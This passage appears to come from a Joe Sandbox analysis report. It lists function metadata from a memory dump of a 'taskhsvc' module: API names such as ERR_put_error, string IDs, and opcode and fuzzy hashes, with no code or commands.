                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: R_put_error
                                                            • String ID: n$p
                                                            • API String ID: 1767461275-484814754
                                                            • Opcode ID: 34fccb6541ca9adcbb67509f30f6bce87c95b697bdfdeb3b09824115c5249272
                                                            • Instruction ID: cd769e05413a399771a7eb6c525e275cb102a83f429dbf9e648035c6336e3bef
                                                            • Opcode Fuzzy Hash: 34fccb6541ca9adcbb67509f30f6bce87c95b697bdfdeb3b09824115c5249272
                                                            • Instruction Fuzzy Hash: AC419B711087428FD7108F68844435BBBF1BB82368F75A71AD5E45F7A0CB71950B8B8A
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CF20DA0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 66COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: F_parse_listV3_get_sectionX509sk_new_null
                                                            • String ID: ,$1
                                                            • API String ID: 4000217896-1847625482
                                                            • Opcode ID: 88faf7ad61440e611ee11306565767bbb84dfb2ad61816068a62e0e575f8e91b
                                                            • Instruction ID: 06d716b33f4951b460311756bdb85d2277d72d62faf64a68e676f4b6de932056
                                                            • Opcode Fuzzy Hash: 88faf7ad61440e611ee11306565767bbb84dfb2ad61816068a62e0e575f8e91b
                                                            • Instruction Fuzzy Hash: F7213C712093428BE7208FE9C58474BFBE5AB89358F218E2CE49487790D77AC944CB56
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CF3EDD0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 65COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: R_put_error
                                                            • String ID: C
                                                            • API String ID: 1767461275-1037565863
                                                            • Opcode ID: 57bf2d5b691d1ce22b7160fc6464e66b045750eee2a1741af383bd12f479a283
                                                            • Instruction ID: e3bd38e60c2e697789e6d4d44e5c2711c750b389bc81bf852b17150b7a7c1e2a
                                                            • Opcode Fuzzy Hash: 57bf2d5b691d1ce22b7160fc6464e66b045750eee2a1741af383bd12f479a283
                                                            • Instruction Fuzzy Hash: B6215975509711AFDB10DF26C640A4BBBF5AFCA348F12AD1CE9A897700D330E9058BD6
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CF76D80 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 60COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ERR_put_error.LIBEAY32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CF76EAE
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: R_put_error
                                                            • String ID: C$m
                                                            • API String ID: 1767461275-1333139144
                                                            • Opcode ID: 95f47a41ea7d65aa2d9a5775bf63b45ae2045b099782841562362f9d7fa74d9b
                                                            • Instruction ID: 8209b0043a75ee3275e7de4ecaac5a6fdc331f4aaf2efefb5719dc09177b6736
                                                            • Opcode Fuzzy Hash: 95f47a41ea7d65aa2d9a5775bf63b45ae2045b099782841562362f9d7fa74d9b
                                                            • Instruction Fuzzy Hash: DA2103759087009BCB20DF25D14460BBBF1BB8A368F129A0DF9A05B390C775E904CFA6
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CE2AFF0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 57COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: J_bsearch_sk_findsk_value
                                                            • String ID: (
                                                            • API String ID: 1331226617-3887548279
                                                            • Opcode ID: f82e2716ebf4d5313ffd0b0fcf72bb4bbfe2ba4659693370bc0b82681ee6839f
                                                            • Instruction ID: f528e3f3c487a67ed8cd79b7528df7a57dcb8d8f8fa2d910bfe20b0786d952c4
                                                            • Opcode Fuzzy Hash: f82e2716ebf4d5313ffd0b0fcf72bb4bbfe2ba4659693370bc0b82681ee6839f
                                                            • Instruction Fuzzy Hash: E3112971A09301CFD741CF28C580B5BFBF4AF85308F21891CE9A69B710E779E9458B96
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CF26C60 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 50COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: __stack_chk_fail$N1_item_d2iR_put_error
                                                            • String ID: n
                                                            • API String ID: 1261462335-2013832146
                                                            • Opcode ID: 248dae32a163957866d4d022ec4b580b405b4d9f4a2fccf9f68833790b25c7a9
                                                            • Instruction ID: 75658d03841950fb874c2b939cc998c9203003ca512e2851a20e4c1fa92a43db
                                                            • Opcode Fuzzy Hash: 248dae32a163957866d4d022ec4b580b405b4d9f4a2fccf9f68833790b25c7a9
                                                            • Instruction Fuzzy Hash: D41128706083009FD700DF25C18060BBBF0BB88318F91D91DE5A88B710E774E9088F96
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CE3E6E0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 38COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: Init
                                                            • String ID:
                                                            • API String ID: 1715882826-0
                                                            • Opcode ID: e5bccdfd2fce094b48d2b510736529b240e2286bf41987285a61737ca95deca2
                                                            • Instruction ID: dfd73239a26c737031324e16d63fabe8fce88d91afe6a5311bc6675d9453d0e7
                                                            • Opcode Fuzzy Hash: e5bccdfd2fce094b48d2b510736529b240e2286bf41987285a61737ca95deca2
                                                            • Instruction Fuzzy Hash: 4F01E4B1608B209BC700AF26C98455FBBF4AF85658F22AC2DE99847700D731E905CBD6
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CE2CF90 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 38COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: Init
                                                            • String ID:
                                                            • API String ID: 1715882826-0
                                                            • Opcode ID: 866d147eb1dbc2273ab3b82b703b3816536f8eade7a89ec3bcf5450114869591
